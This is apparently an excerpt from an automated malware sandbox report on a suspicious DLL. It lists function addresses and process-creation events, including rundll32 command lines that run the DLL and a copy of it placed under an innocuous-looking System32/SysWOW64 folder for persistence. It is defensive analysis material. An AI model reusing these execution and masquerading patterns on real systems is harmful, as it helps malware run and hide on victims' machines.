                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008290BA1_2_008290BA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008298BD1_2_008298BD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082BEC91_2_0082BEC9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008308D11_2_008308D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00827ED11_2_00827ED1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082CCD41_2_0082CCD4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00820ADE1_2_00820ADE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082ECE31_2_0082ECE3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082AEEB1_2_0082AEEB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082A8F01_2_0082A8F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082DEF41_2_0082DEF4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008130F61_2_008130F6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00814C001_2_00814C00
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00818C091_2_00818C09
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00811A0A1_2_00811A0A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081220A1_2_0081220A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00821C101_2_00821C10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081E21C1_2_0081E21C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081F41F1_2_0081F41F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008252201_2_00825220
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081D2231_2_0081D223
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00819E221_2_00819E22
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081EC271_2_0081EC27
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082F83F1_2_0082F83F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00831A3C1_2_00831A3C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008120431_2_00812043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082E4411_2_0082E441
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008138451_2_00813845
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00812A461_2_00812A46
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081A0481_2_0081A048
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008126541_2_00812654
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00819A571_2_00819A57
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082406E1_2_0082406E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00811C761_2_00811C76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008193841_2_00819384
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081758F1_2_0081758F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00824D8D1_2_00824D8D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00814F8E1_2_00814F8E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081FD911_2_0081FD91
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008311931_2_00831193
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082B3971_2_0082B397
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082D99A1_2_0082D99A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00822FA21_2_00822FA2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00829DA11_2_00829DA1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00824BAA1_2_00824BAA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00827BB21_2_00827BB2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082B1B51_2_0082B1B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081BFB61_2_0081BFB6
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008325C31_2_008325C3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00816FC41_2_00816FC4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081A3DF1_2_0081A3DF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008155E81_2_008155E8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082BFE81_2_0082BFE8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008303F11_2_008303F1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081C5FE1_2_0081C5FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008135021_2_00813502
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008123091_2_00812309
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082FD101_2_0082FD10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081251C1_2_0081251C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008159231_2_00815923
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00816B251_2_00816B25
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0083292B1_2_0083292B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00830B341_2_00830B34
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008313431_2_00831343
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_008133451_2_00813345
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082F14D1_2_0082F14D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0081C1581_2_0081C158
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00813F5C1_2_00813F5C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082056A1_2_0082056A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00821F6B1_2_00821F6B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0082577E1_2_0082577E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A66201_2_6E6A6620
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A57301_2_6E6A5730
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A5EE01_2_6E6A5EE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6CC6FE1_2_6E6CC6FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6AF7001_2_6E6AF700
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6C37801_2_6E6C3780
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6BDC5D1_2_6E6BDC5D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6B1CD01_2_6E6B1CD0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6BDA2D1_2_6E6BDA2D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A2A801_2_6E6A2A80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6BA29D1_2_6E6BA29D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6D30741_2_6E6D3074
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6A66203_2_6E6A6620
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6A57303_2_6E6A5730
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6A5EE03_2_6E6A5EE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6CC6FE3_2_6E6CC6FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6AF7003_2_6E6AF700
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6C37803_2_6E6C3780
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6BDC5D3_2_6E6BDC5D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6B1CD03_2_6E6B1CD0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6BDA2D3_2_6E6BDA2D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6A2A803_2_6E6A2A80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6BA29D3_2_6E6BA29D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6D30743_2_6E6D3074
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6D19293_2_6E6D1929
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F0B3419_2_030F0B34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E4BAA19_2_030E4BAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E31A619_2_030E31A6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E47BC19_2_030E47BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D55E819_2_030D55E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DC5FE19_2_030DC5FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D220A19_2_030D220A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D441E19_2_030D441E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DEC2719_2_030DEC27
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E522019_2_030E5220
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D943C19_2_030D943C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EF83F19_2_030EF83F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D384519_2_030D3845
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D204319_2_030D2043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E748A19_2_030E748A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DAC9519_2_030DAC95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E78A519_2_030E78A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F08D119_2_030F08D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EECE319_2_030EECE3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EDEF419_2_030EDEF4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D30F619_2_030D30F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D230919_2_030D2309
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D350219_2_030D3502
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D251C19_2_030D251C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EFD1019_2_030EFD10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F292B19_2_030F292B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D6B2519_2_030D6B25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E672619_2_030E6726
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D592319_2_030D5923
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EF14D19_2_030EF14D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D334519_2_030D3345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F134319_2_030F1343
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D3F5C19_2_030D3F5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DC15819_2_030DC158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E056A19_2_030E056A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E1F6B19_2_030E1F6B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E4D8D19_2_030E4D8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D4F8E19_2_030D4F8E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D938419_2_030D9384
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030ED99A19_2_030ED99A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EB39719_2_030EB397
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F119319_2_030F1193
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DFD9119_2_030DFD91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E2FA219_2_030E2FA2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E9DA119_2_030E9DA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EB1B519_2_030EB1B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DBFB619_2_030DBFB6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E7BB219_2_030E7BB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E43B319_2_030E43B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D6FC419_2_030D6FC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F25C319_2_030F25C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DA3DF19_2_030DA3DF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EBFE819_2_030EBFE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F03F119_2_030F03F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D8C0919_2_030D8C09
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D1A0A19_2_030D1A0A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D4C0019_2_030D4C00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DE21C19_2_030DE21C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DF41F19_2_030DF41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E1C1019_2_030E1C10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DD22319_2_030DD223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D9E2219_2_030D9E22
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F1A3C19_2_030F1A3C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DA04819_2_030DA048
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D2A4619_2_030D2A46
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EE44119_2_030EE441
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D265419_2_030D2654
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D9A5719_2_030D9A57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E406E19_2_030E406E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D1C7619_2_030D1C76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DCC8D19_2_030DCC8D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E4E8A19_2_030E4E8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030F068719_2_030F0687
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D728319_2_030D7283
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EAC9B19_2_030EAC9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D3C9119_2_030D3C91
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030ED09119_2_030ED091
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DDAAE19_2_030DDAAE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030ECAA819_2_030ECAA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030ED6A719_2_030ED6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030DFEA019_2_030DFEA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E66BC19_2_030E66BC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E98BD19_2_030E98BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E90BA19_2_030E90BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030D5AB219_2_030D5AB2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EBEC919_2_030EBEC9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030E0ADE19_2_030E0ADE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030ECCD419_2_030ECCD4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EAEEB19_2_030EAEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 19_2_030EA8F019_2_030EA8F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E6B5BE0 appears 44 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E6B5BE0 appears 46 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E6A13F0 zwxnlwalmcbgmt,1_2_6E6A13F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E6A13F0 zwxnlwalmcbgmt,3_2_6E6A13F0
                      Source: FIyE6huzxV.dllBinary or memory string: OriginalFilenameErulfuaekg.dll6 vs FIyE6huzxV.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                      Source: FIyE6huzxV.dllVirustotal: Detection: 19%
                      Source: FIyE6huzxV.dllReversingLabs: Detection: 22%
                      Source: FIyE6huzxV.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,Control_RunDLL
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,abziuleoxsborpb
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,aejkroaebsbxdnkhb
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Esbkudiqskvxrfyc\iscoyl.gsm",sRLFwndulUmgRNP
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Esbkudiqskvxrfyc\iscoyl.gsm",Control_RunDLL
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,Control_RunDLLJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,abziuleoxsborpbJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\FIyE6huzxV.dll,aejkroaebsbxdnkhbJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\FIyE6huzxV.dll",Control_RunDLL